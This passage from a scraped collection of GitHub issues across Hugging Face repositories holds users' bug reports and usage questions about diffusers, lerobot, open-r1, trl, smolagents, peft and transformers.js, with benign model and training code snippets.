    "body": "### Describe the bug\n\n# ZeroDivisionError when performing forward pass with UNet3DConditionModel\n\nI'm encountering a ZeroDivisionError when attempting to perform a forward pass with the UNet3DConditionModel. This seems to be related to the num_attention_heads parameter being None, which causes self.inner_dim to be 0.\n\nHere's the code I'm using:\n\n```python\nfrom diffusers import UNet3DConditionModel\nimport torch\n\nmodel = UNet3DConditionModel(\n    down_block_types=(\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"DownBlock3D\",\n    ),\n    up_block_types=(\n        \"UpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n    ),\n    block_out_channels=(32, 64, 128, 128),\n    norm_num_groups=4,\n)\n\ndata = torch.randn(1, 4, 32, 32, 32)\n\nmodel(data, timestep=3, encoder_hidden_states=torch.zeros(1, 4, 32, 32, 32))\n```\n\nThe error traceback indicates that the issue occurs in the attention processing:\n\n```\nZeroDivisionError: integer division or modulo by zero\n```\n\nThis seems to be because num_attention_heads is None, leading to self.inner_dim = 0 in the transformer configuration.\n\nI noticed that in the UNet3DConditionModel implementation, there's a check that raises an error if num_attention_heads is provided:\n\n```python\nif num_attention_heads is not None:\n    raise NotImplementedError(\n        \"At the moment it is not possible to define the number of attention heads via num_attention_heads because of a naming issue as described in https://github.com/huggingface/diffusers/issues/2011#issuecomment-1547958131 . Passing num_attention_heads will only be supported in diffusers v0.19.\"\n    )\n```\n\nGiven this limitation, I'm unsure how to properly configure the model to avoid this error. Could you provide guidance on:\n1. How to correctly perform a forward pass with demo hidden states\n2. What parameters I should adjust to ensure the model is properly configured\n3. If there's a workaround for this issue in the current version of diffusers\n\nThank you for your assistance!\n\n### Reproduction\n\n```python\nfrom diffusers import UNet3DConditionModel\nimport torch\n\nmodel = UNet3DConditionModel(\n    down_block_types=(\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"DownBlock3D\",\n    ),\n    up_block_types=(\n        \"UpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n    ),\n    block_out_channels=(32, 64, 128, 128),\n    norm_num_groups=4,\n)\n\ndata = torch.randn(1, 4, 32, 32, 32)\n\nmodel(data, timestep=3, encoder_hidden_states=torch.zeros(1, 4, 32, 32, 32))\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nPython 3.11.10\ndiffusers version 0.32.2\nubuntu 24.04\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11042",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-12T09:26:01Z",
    "updated_at": "2025-03-13T02:00:12Z",
    "comments": 2,
    "user": "txz32102"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 851,
    "title": "Hello, I would like to ask if I can use my ROS2 MoveIt2 robotic arm?",
    "body": "Can it support ROS training? I believe this would be beneficial for ecosystem development.",
    "url": "https://github.com/huggingface/lerobot/issues/851",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-12T07:39:51Z",
    "updated_at": "2025-08-04T19:29:03Z",
    "user": "Gates-456"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 502,
    "title": "How to use vllm with 2 GPUs?",
    "body": "Just as GRPO OOM #475 stated, the vllm kv init is so large that 1 A100 80GB could not hold it, while I have 8*A100 in total.\nHowever, only 1 GPU is allowed to assign to vllm, as `vllm_device: auto` or  `ib/python3.10/site-packages/trl/trainer/grpo_trainer.py`.\n\nHow should I solve the issue? Would anybody know?\n",
    "url": "https://github.com/huggingface/open-r1/issues/502",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-12T03:36:18Z",
    "updated_at": "2025-06-03T11:55:47Z",
    "user": "greatxue"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11036,
    "title": "Why perform the following operations on the latent condition?",
    "body": "in the code :https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/wan/pipeline_wan_i2v.py\nline 395-404:\n```\nlatents_mean = (\n    torch.tensor(self.vae.config.latents_mean)\n    .view(1, self.vae.config.z_dim, 1, 1, 1)\n    .to(latents.device, latents.dtype)\n)\nlatents_std = 1.0 / torch.tensor(self.vae.config.latents_std).view(1, self.vae.config.z_dim, 1, 1, 1).to(\n    latents.device, latents.dtype\n)\n\nlatent_condition = (latent_condition - latents_mean) * latents_std\n```\nThe official inference code of Wan2.1 does not perform similar operations\uff1a\nhttps://github.com/Wan-Video/Wan2.1/blob/main/wan/image2video.py#L237",
    "url": "https://github.com/huggingface/diffusers/issues/11036",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-12T02:32:09Z",
    "updated_at": "2025-03-15T02:40:13Z",
    "comments": 2,
    "user": "trouble-maker007"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 847,
    "title": "Is there a way Merge | Convert | Edit datasets function or a way how we can train model using different datasets ?",
    "body": "Hey, everyone. \n\nAt the moment, we have this problem: We have recorded datasets with around 100 episodes each, but we would like to train our model with 1000 episodes. Unfortunately, we didn't find a way to load multiple datasets into a single policy training job, is it even possible ? If no, ss there a way to merge a couple of small datasets into a big one? \n\nIf none of that is possible, is there a way to convert to hdf5 ? \n\nI was referencing https://github.com/huggingface/lerobot/issues/533, but there are no answers as well.  \n",
    "url": "https://github.com/huggingface/lerobot/issues/847",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "dataset"
    ],
    "created_at": "2025-03-11T17:25:08Z",
    "updated_at": "2025-10-17T12:09:32Z",
    "user": "runmaget"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 846,
    "title": "How to convert my own dataset to LerobotDataset format?",
    "body": "Hi, I am new to Lerobot and have a dataset in my own format. I would like to convert it to the LerobotDataset format.\n\nI referred to `lerobot/scripts/push_dataset_to_hub.py`, but it seems to be deprecated. Could you provide guidance or an updated method for converting custom datasets?\n\nThanks in advance!",
    "url": "https://github.com/huggingface/lerobot/issues/846",
    "state": "closed",
    "labels": [
      "question",
      "dataset"
    ],
    "created_at": "2025-03-11T09:17:23Z",
    "updated_at": "2025-04-15T00:59:10Z",
    "user": "yilin404"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 498,
    "title": "How to Enable enforce_eager or Disable CUDA Graph in Evaluation",
    "body": "Evaluation code is currently using lighteval and vLLM for inference, and I would like to disable CUDA Graph by enabling options like ```enforce_eager```. However, I could not find a command-line argument for this in ```$MODEL_ARGS```. Additionally, setting it as an environment variable (e.g., VLLM_ENFORCE_EAGER) does not seem to work.\n\nIs there a way to achieve this? Any guidance would be appreciated.",
    "url": "https://github.com/huggingface/open-r1/issues/498",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-11T00:25:49Z",
    "updated_at": "2025-03-11T04:54:02Z",
    "user": "superdocker"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11020,
    "title": "Multi-gpus Context Parallel training support?",
    "body": "Nowadays, the number of parameters in video generation models is increasing, and the video length is increasing. When training video models, it is difficult to fit a complete video sequence(200k~ tokens) on a single GPU. Some sequence parallel training technologies can solve this problem, such as the [fastvideo](https://github.com/hao-ai-lab/FastVideo) training framework, but the imperfection of this framework makes it difficult to use. Can the diffusers framework support sequence parallel training?",
    "url": "https://github.com/huggingface/diffusers/issues/11020",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-10T11:45:30Z",
    "updated_at": "2025-07-18T13:05:08Z",
    "comments": 2,
    "user": "yinian-lw"
  },
  {
    "repo": "huggingface/blog",
    "number": 2728,
    "title": "Open In \"02_how_to_generate\", code cell 1 has an outdated version of tensorflow",
    "body": "The notebook 02_how_to_generate.ipynb currently specifies tensorflow==2.1, which is no longer available.\n\nif we run that cell we get the error:Could not find a version that satisfies the requirement tensorflow==2.1 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.0.post1, 2.15.1, 2.16.0rc0, 2.16.1, 2.16.2, 2.17.0rc0, 2.17.0rc1, 2.17.0, 2.17.1, 2.18.0rc0, 2.18.0rc1, 2.18.0rc2, 2.18.0, 2.19.0rc0) ERROR: No matching distribution found for tensorflow==2.1.",
    "url": "https://github.com/huggingface/blog/issues/2728",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-09T18:05:55Z",
    "updated_at": "2025-03-09T18:06:11Z",
    "user": "Umashankar86"
  },
  {
    "repo": "huggingface/blog",
    "number": 2727,
    "title": "Open In \"02_how_to_generate\", code cell 1 has an outdated version of tensorflow",
    "body": "The notebook 02_how_to_generate.ipynb currently specifies tensorflow==2.1, which is no longer available.\n\nif we run that cell we get the error:Could not find a version that satisfies the requirement tensorflow==2.1 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.0.post1, 2.15.1, 2.16.0rc0, 2.16.1, 2.16.2, 2.17.0rc0, 2.17.0rc1, 2.17.0, 2.17.1, 2.18.0rc0, 2.18.0rc1, 2.18.0rc2, 2.18.0, 2.19.0rc0) ERROR: No matching distribution found for tensorflow==2.1.",
    "url": "https://github.com/huggingface/blog/issues/2727",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-09T18:04:48Z",
    "updated_at": "2025-03-09T18:05:03Z",
    "user": "Umashankar86"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7442,
    "title": "Flexible Loader",
    "body": "### Feature request\n\nCan we have a utility function that will use `load_from_disk` when given the local path and `load_dataset` if given an HF dataset?\n\nIt can be something as simple as this one:\n\n```\ndef load_hf_dataset(path_or_name):\n    if os.path.exists(path_or_name):\n        return load_from_disk(path_or_name)\n    else:\n        return load_dataset(path_or_name)\n```\n\n### Motivation\n\nThis can be done inside the user codebase, too, but in my experience, it becomes repetitive code.\n\n### Your contribution\n\nI can open a pull request.",
    "url": "https://github.com/huggingface/datasets/issues/7442",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-03-09T16:55:03Z",
    "updated_at": "2025-03-27T23:58:17Z",
    "comments": 3,
    "user": "dipta007"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1751,
    "title": "Analyze uploaded PDF files through OpenAI API",
    "body": "When I upload a PDF file and leverage it, I will get the base64 data. But I didn't find the code to process it in endpoints/openai, while it can handle the image base64 data. Besides, I failed to transfer it back to text. How can I analyze the file through OpenAI API? \n\n![Image](https://github.com/user-attachments/assets/278ec727-2e9b-41b8-a8d3-080d50a5a9e9)",
    "url": "https://github.com/huggingface/chat-ui/issues/1751",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2025-03-09T09:31:13Z",
    "updated_at": "2025-03-15T18:38:17Z",
    "comments": 2,
    "user": "zu0feng"
  },
  {
    "repo": "huggingface/hf-hub",
    "number": 99,
    "title": "Where is the `0.4.2` commit?",
    "body": "I saw on [crates.io](https://crates.io/crates/hf-hub/versions) that the latest version of hf-hub is 0.4.2, but I can't find the 0.4.2 tag on GitHub. Could you tell me what is the commit ID corresponding to this version?\n\nSincerely suggest that you add a corresponding tag for each version release, which can effectively avoid such inefficient communication and thus speed up the work efficiency of other contributors.\ud83d\ude4f",
    "url": "https://github.com/huggingface/hf-hub/issues/99",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-08T12:43:18Z",
    "updated_at": "2025-06-16T09:41:15Z",
    "user": "HairlessVillager"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36613,
    "title": "In \"02_how_to_generate\", code cell 1 has an error message",
    "body": "### System Info\n\nIn \"02_how_to_generate\", code cell 1 has an error message but the rest works fine: ERROR: Could not find a version that satisfies the requirement tensorflow==2.1 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.0.post1, 2.15.1, 2.16.0rc0, 2.16.1, 2.16.2, 2.17.0rc0, 2.17.0rc1, 2.17.0, 2.17.1, 2.18.0rc0, 2.18.0rc1, 2.18.0rc2, 2.18.0, 2.19.0rc0) ERROR: No matching distribution found for tensorflow==2.1.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nRun code cell 1\n\n### Expected behavior\n\nNo error message should appear when running code cell",
    "url": "https://github.com/huggingface/transformers/issues/36613",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-08T07:46:39Z",
    "updated_at": "2025-04-16T08:03:04Z",
    "user": "kvutien"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11008,
    "title": "Support wan2.1 video model?",
    "body": "### Did you like the remote VAE solution?\n\nYes. \n\n### What can be improved about the current solution?\n\nWan2.1 video model support is appreciated!\n\n### What other VAEs you would like to see if the pilot goes well?\n\nWan2.1 video model support is appreciated!\n\n### Notify the members of the team\n\n@hlky @sayakpaul",
    "url": "https://github.com/huggingface/diffusers/issues/11008",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-08T04:21:33Z",
    "updated_at": "2025-05-09T15:03:47Z",
    "comments": 6,
    "user": "kexul"
  },
  {
    "repo": "huggingface/trl",
    "number": 3028,
    "title": "Distill teacher models where the vocab size of teacher and student is different",
    "body": "I am trying to distill a Qwen2.5-7B-Instruct to Qwen2.5-5B-Instruct using a sample code \n\n```from datasets import Dataset\nfrom trl import GKDConfig, GKDTrainer\nfrom transformers import (\n    AutoModelForCausalLM,\n    AutoTokenizer,\n)\n\nNUM_DUMMY_SAMPLES = 100\n\ntokenizer = AutoTokenizer.from_pretrained(\"Qwen/Qwen2.5-0.5B-Instruct\")\n\nmodel = AutoModelForCausalLM.from_pretrained(\"Qwen/Qwen2.5-0.5B-Instruct\")\n\nteacher_model = AutoModelForCausalLM.from_pretrained(\"Qwen/Qwen2.5-7B-Instruct\")\n\ntrain_dataset = Dataset.from_dict(\n    {\n        \"messages\": [\n            [\n                {\"role\": \"user\", \"content\": \"Hi, how are you?\"},\n                {\"role\": \"assistant\", \"content\": \"I'm great thanks\"},\n            ]\n        ]\n        * NUM_DUMMY_SAMPLES\n    }\n)\neval_dataset = Dataset.from_dict(\n    {\n        \"messages\": [\n            [\n                {\"role\": \"user\", \"content\": \"What colour is the sky?\"},\n                {\"role\": \"assistant\", \"content\": \"The sky is blue\"},\n            ]\n        ]\n        * NUM_DUMMY_SAMPLES\n    }\n)\n\ntraining_args = GKDConfig(output_dir=\"gkd-model\", per_device_train_batch_size=1)\ntrainer = GKDTrainer(\n    model=model,\n    teacher_model=teacher_model,\n    args=training_args,\n    processing_class=tokenizer,\n    train_dataset=train_dataset,\n    eval_dataset=eval_dataset,\n)\ntrainer.train()```\n\nBut this gives me an error because their vocab sizes are different (so might be their tokenizers). Is there a workaround for these kind of situations? How are such cases handled?",
    "url": "https://github.com/huggingface/trl/issues/3028",
    "state": "open",
    "labels": [
      "\ud83c\udfcb GKD"
    ],
    "created_at": "2025-03-08T00:29:01Z",
    "updated_at": "2025-10-29T04:15:50Z",
    "user": "shaunakjoshi12"
  },
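A note on the vocab mismatch above: Qwen2.5 checkpoints share one tokenizer, and their `vocab_size` values differ mainly through embedding padding. Under that assumption (and only then), here is a minimal sketch of a distillation loss computed over the shared vocabulary prefix. This is illustrative glue code, not a TRL feature; where exactly to hook it into `GKDTrainer` would need checking against the TRL source.

```python
import torch
import torch.nn.functional as F

def shared_vocab_kl(student_logits: torch.Tensor,
                    teacher_logits: torch.Tensor,
                    temperature: float = 1.0) -> torch.Tensor:
    """KL(teacher || student) over the shared vocabulary prefix.

    Only valid when both models use the *same tokenizer* and differ just in
    embedding padding (true within the Qwen2.5 family); truncating to the
    smaller vocab then drops only padded, never-sampled entries.
    """
    vocab = min(student_logits.size(-1), teacher_logits.size(-1))
    log_p_student = F.log_softmax(student_logits[..., :vocab] / temperature, dim=-1)
    log_p_teacher = F.log_softmax(teacher_logits[..., :vocab] / temperature, dim=-1)
    return F.kl_div(log_p_student, log_p_teacher, log_target=True, reduction="batchmean")
```

If the tokenizers genuinely differ, logit truncation is not meaningful and a cross-tokenizer method (e.g. a universal-logit-distillation-style loss) would be needed instead.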
  {
    "repo": "huggingface/diffusers",
    "number": 11005,
    "title": "pipeline_wan_i2v.py: minor discrepancy between arg default and docstring",
    "body": "### Describe the bug\n\nhttps://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/wan/pipeline_wan_i2v.py\n\nLine 447 (arg default):\n```output_type: Optional[str] = \"np\",```\n\nLine 496 (docstring):\n```output_type (`str`, *optional*, defaults to `\"pil\"`):```\n\n### Reproduction\n\nn/a\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nn/a\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11005",
    "state": "closed",
    "labels": [
      "bug",
      "good first issue",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2025-03-07T16:37:48Z",
    "updated_at": "2025-04-24T18:49:38Z",
    "comments": 2,
    "user": "rolux"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 301,
    "title": "How to train text-to-video generation model on different generation models using Disney dataset?",
    "body": "The current repository does not explicitly describe ho to change training methods between t2v or i2v.\n",
    "url": "https://github.com/huggingface/finetrainers/issues/301",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-07T16:02:42Z",
    "updated_at": "2025-03-07T16:08:06Z",
    "user": "kjosh925"
  },
  {
    "repo": "huggingface/speech-to-speech",
    "number": 159,
    "title": "What is from df.enhance import enhance, init_df ? in vad_handler?",
    "body": "",
    "url": "https://github.com/huggingface/speech-to-speech/issues/159",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-07T15:07:53Z",
    "updated_at": "2025-03-07T15:07:53Z",
    "user": "Manukrishna2K"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11002,
    "title": "Any chance class members like self._interrupt could be defined in __init__ across pipelines?",
    "body": "### Describe the bug\n\nI think there is no benefit to late initializing here and it puts a burden on the library user that could be easily avoided. Also leads to some confusion as it is uncommon, code inspection flags this. Let me know if I'm missing something.\n\n### Reproduction\n\n```\nclass WanImageToVideoPipeline:\n\tdef __init__(self):\n\t\tpass\n\t\n\tdef __call__(self, *args, **kwargs):\n\t\tself._interrupt = False\n\t\treturn 23\n\n\t@property\n\tdef interrupt(self):\n\t\treturn self._interrupt\n\t\npipe = WanImageToVideoPipeline()\n\ndef on_async_user_abort_call_me_any_time():\n\t# check if already interrupted but mid step\n\tprint(pipe.interrupt)\n\n\non_async_user_abort_call_me_any_time()\n```\n\n### Logs\n\n```shell\nAttributeError: 'WanImageToVideoPipeline' object has no attribute '_interrupt'. Did you mean: 'interrupt'?\n```\n\n### System Info\n\nDiffusers 0.33.0.dev0, Linux, Python 3.10\n\n### Who can help?\n\n@yiyixuxu @DN6",
    "url": "https://github.com/huggingface/diffusers/issues/11002",
    "state": "open",
    "labels": [
      "bug",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2025-03-07T11:28:27Z",
    "updated_at": "2025-05-26T07:21:47Z",
    "comments": 9,
    "user": "spezialspezial"
  },
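For reference, the change this report asks for is small; a minimal sketch of the eager-initialization pattern (the pattern only, not a diffusers patch):

```python
class WanImageToVideoPipeline:
    def __init__(self):
        # initialize interrupt state eagerly so the property is always
        # readable, even before the first __call__
        self._interrupt = False

    def __call__(self, *args, **kwargs):
        self._interrupt = False  # reset per run
        return 23

    @property
    def interrupt(self) -> bool:
        return self._interrupt
```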
  {
    "repo": "huggingface/diffusers",
    "number": 10993,
    "title": "f-divergence",
    "body": "Is there a plan to implement the f-divergence scheduler ? I would like to contribute that to the library.",
    "url": "https://github.com/huggingface/diffusers/issues/10993",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-06T22:46:13Z",
    "updated_at": "2025-04-06T15:02:55Z",
    "comments": 5,
    "user": "manmeet3591"
  },
  {
    "repo": "huggingface/smolagents",
    "number": 902,
    "title": "How to populate custom variables in prompt template?",
    "body": "I'm trying to configure custom template variables in my system prompt.\n\n**Current Implementation:**\n\n1. I have a system prompt template with custom variables:\n```python\nCUSTOM_CODE_SYSTEM_PROMPT = \"\"\"You are {{ bot_name }}, a customer support assistant...\n{{ formatting_guidelines }}\n```\n\n2. Agent creation and configuration:\n```python\nfrom smolagents import CodeAgent, LiteLLMModel\n\ndef get_agent(platform: str = \"whatsapp\", variables: dict = None):\n    manager_agent = CodeAgent(\n        tools=[ClinicKnowledgeTool()],\n        model=model,\n        max_steps=3,\n    )\n    return manager_agent\n```\n\n3. Calling the agent:\n```python\nagent = get_agent(\n    platform=platform,\n    variables={\n        \"conversation_history\": conversation_history,\n        \"formatting_guidelines \": \"test\",\n    },\n)\n\nagent.prompt_templates[\"system_prompt\"] = CUSTOM_CODE_SYSTEM_PROMPT\n```\n\n**Questions:**\n1. What's the correct way to populate template variables like `{{ bot_name }}` and `{{ formatting_guidelines }}` in the system prompt?\n2. How do I handle dynamic variables like `conversation_history` that change with each request?\n\n**Environment:**\n- smolagents v1.10.0 \n- Python 3.10+\n- FastAPI integration",
    "url": "https://github.com/huggingface/smolagents/issues/902",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-06T20:45:51Z",
    "updated_at": "2025-03-07T08:54:22Z",
    "user": "Luisotee"
  },
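smolagents prompt templates use Jinja-style placeholders, so one workaround is to render the variables yourself before assigning the system prompt, re-rendering per request for dynamic values such as `conversation_history`. A sketch (an assumption about intended usage, not a documented smolagents API; note that the stray trailing space in the `"formatting_guidelines "` key above would make the placeholder silently miss):

```python
from jinja2 import Template

CUSTOM_CODE_SYSTEM_PROMPT = """You are {{ bot_name }}, a customer support assistant...
{{ formatting_guidelines }}"""

def build_system_prompt(variables: dict) -> str:
    # keys must match the placeholders exactly (no trailing spaces)
    return Template(CUSTOM_CODE_SYSTEM_PROMPT).render(**variables)

prompt = build_system_prompt({
    "bot_name": "ClinicBot",            # hypothetical values
    "formatting_guidelines": "test",
})
print(prompt)
# then, per request: agent.prompt_templates["system_prompt"] = prompt
```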
  {
    "repo": "huggingface/agents-course",
    "number": 295,
    "title": "[QUESTION] Ambiguity what chat templates are.",
    "body": "Issue:\n\nWhere \u27a1  https://huggingface.co/learn/agents-course/unit1/messages-and-special-tokens\n\n> This is where chat templates come in. They act as the bridge between conversational messages (user and assistant turns) and the specific formatting requirements of your chosen LLM. In other words, chat templates structure the communication between the user and the agent, ensuring that every model\u2014despite its unique special tokens\u2014receives the correctly formatted prompt.\n\nIn my opinion, the first sentence about chat templates is correct. The second part seems wrong.\n\nIt says  `...chat templates structure the communication between the user and the agent...`. \n\nCorrect Sentence:\n\n`...chat templates structure the communication between the agents and the language model or LLM...`. \n\nReason:\n\nThe Chat templates are implemented inside the agents with respective `chat.completion` method to send the user's request, through agents, to the LLMs. \n\nThe user just types into the chatbox as similar to how we type messages. The text-flow is as below in it's simplest form is as below:\nUser's message >> Chat Templates wraps the message as per LLM's specs >> send to LLMs through agents.\n\nSo the `the user and the agent` part doesn't seem very right to me. I did give my best alternative, I could thought of. I okay with anything else you come up with.",
    "url": "https://github.com/huggingface/agents-course/issues/295",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-06T17:12:41Z",
    "updated_at": "2025-03-06T17:12:41Z",
    "user": "MekongDelta-mind"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 483,
    "title": "How to calculate total optimization steps",
    "body": "I ran it on 8 GPUs and set num_generations to 8, num_processes=7\uff0c Why Total optimization steps=196, isn't it Num examples/Total train batch size? It seems that multiplying by num_generations yields 196. Why do we need to multiply by num_generations\uff1f\n[INFO|trainer.py:2405] 2025-03-06 12:04:09,913 >> ***** Running training *****\n[INFO|trainer.py:2406] 2025-03-06 12:04:09,913 >>   Num examples = 5,498\n[INFO|trainer.py:2407] 2025-03-06 12:04:09,914 >>   Num Epochs = 1\n[INFO|trainer.py:2408] 2025-03-06 12:04:09,914 >>   Instantaneous batch size per device = 8\n[INFO|trainer.py:2411] 2025-03-06 12:04:09,914 >>   Total train batch size (w. parallel, distributed & accumulation) = 224\n[INFO|trainer.py:2412] 2025-03-06 12:04:09,914 >>   Gradient Accumulation steps = 4\n[INFO|trainer.py:2413] 2025-03-06 12:04:09,914 >>   Total optimization steps = 196\n[INFO|trainer.py:2414] 2025-03-06 12:04:09,915 >>   Number of trainable parameters = 7,615,616,512",
    "url": "https://github.com/huggingface/open-r1/issues/483",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-06T09:47:19Z",
    "updated_at": "2025-03-13T08:45:23Z",
    "user": "HelloWorld506"
  },
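One consistent reading of those logs (an interpretation of the numbers, not a statement about the trainer's internals): in GRPO every prompt is expanded into `num_generations` completions, and the batch size counts completions, so the step count is computed over completions rather than prompts.

```python
num_examples = 5498
num_generations = 8
total_train_batch_size = 8 * 7 * 4   # per-device batch * processes * grad accum = 224

completions = num_examples * num_generations      # 43,984 completions
steps = completions // total_train_batch_size     # integer division
print(steps)  # 196 -> matches "Total optimization steps = 196"
```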
  {
    "repo": "huggingface/transformers.js",
    "number": 1221,
    "title": "How to use Xenova/deplot using the transformers.js library.",
    "body": "### Question\n\nCurrently I'm doing:\n\n```\n      this.pipeline = await pipeline(\"image-text-to-text\", \"Xenova/deplot\", {\n        progress_callback: (progress) => {\n          this.updateProgress({ \n            status: `Loading model: ${progress.status}`, \n            progress: 0.1 + (progress.progress * 0.9) \n          });\n        },\n        device: \"cpu\",\n        dtype: dtype,\n      });\n```\n\nI get the following error:\n\n```\nError: Unsupported pipeline: image-text-to-text. Must be one of [text-classification,token-classification,question-answering,fill-mask,summarization,translation,text2text-generation,text-generation,zero-shot-classification,audio-classification,zero-shot-audio-classification,automatic-speech-recognition,text-to-audio,image-to-text,image-classification,image-segmentation,zero-shot-image-classification,object-detection,zero-shot-object-detection,document-question-answering,image-to-image,depth-estimation,feature-extraction,image-feature-extraction]\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1221",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-06T07:56:07Z",
    "updated_at": "2025-03-06T11:36:19Z",
    "user": "aadya940"
  },
  {
    "repo": "huggingface/peft",
    "number": 2410,
    "title": "running forward loop using get_peft_model disables requires_grad on output",
    "body": "Hi, \nI would like to report a recent issue I have been facing, but I am not sure if it is a bug or I am doing something wrong in the process. The steps to re-create the steps are easy. The issue happens when I try to convert **Qwen2-VL-2B-Instruct** model into a PEFT model using `get_peft_model` method. Simply load the model using the sample code in https://huggingface.co/Qwen/Qwen2-VL-2B-Instruct and try to convert it to a PEFT model using a typical **8bit** LoraConfig with just sample `target_modules=[\"q_proj\", \"v_proj\"]`. Then simply run a forward call to the model using a dummy input, such as `input_ids = torch.zeros((4, 1247)).to(device)`. When I inspect the `requires_grad` of `logits` attribute of the output, it is False. Meaning that I cannot run backward based on that output. This issue has been puzzling me for a while. I would appreciate if you can help me with a solution or advice how to address it properly. \n",
    "url": "https://github.com/huggingface/peft/issues/2410",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-06T05:12:42Z",
    "updated_at": "2025-04-13T15:03:40Z",
    "comments": 4,
    "user": "Hamidreza3252"
  },
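A guess at the cause, based on common PEFT usage with quantized bases rather than a confirmed diagnosis of this report: an 8-bit base model usually needs to be prepared before wrapping, otherwise its outputs can carry `requires_grad=False`. A sketch:

```python
import torch
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from transformers import BitsAndBytesConfig, Qwen2VLForConditionalGeneration

model = Qwen2VLForConditionalGeneration.from_pretrained(
    "Qwen/Qwen2-VL-2B-Instruct",
    quantization_config=BitsAndBytesConfig(load_in_8bit=True),
    device_map="auto",
)
# casts norms to fp32 and re-enables input gradients for k-bit bases;
# without this, logits of a quantized base often end up detached
model = prepare_model_for_kbit_training(model)

peft_model = get_peft_model(model, LoraConfig(r=8, target_modules=["q_proj", "v_proj"]))
dummy = torch.zeros((1, 16), dtype=torch.long, device=model.device)
print(peft_model(input_ids=dummy).logits.requires_grad)  # expected: True
```

`model.enable_input_require_grads()` is the narrower switch if the full k-bit preparation is not wanted.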
  {
    "repo": "huggingface/lerobot",
    "number": 826,
    "title": "Should the pi0 pytorch model on Huggingface load model.safetensors or the other three satetensors?",
    "body": "https://huggingface.co/lerobot/pi0/tree/main\n\nWhat is the difference between `model.safetensors` and the other three satetensors (`model-00001-of-0000*.safetensors`)? The pi0 model `from_pretrained()` method will load `model.safetensor`s by default instead of `model-00001-of-0000*.safetensors`.\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/826",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-03-06T03:12:05Z",
    "updated_at": "2025-10-08T08:42:49Z",
    "user": "chopinxxxx"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 290,
    "title": "[QUESTION] First Agent code does not produce any output",
    "body": "I cloned and tried running the first agent app.py. I wanted to try the image generation tool. the application built and ran but when I tried typing something in the chat such as \"generate an image of a cat\", there is no response from the bot. it stays blank\n",
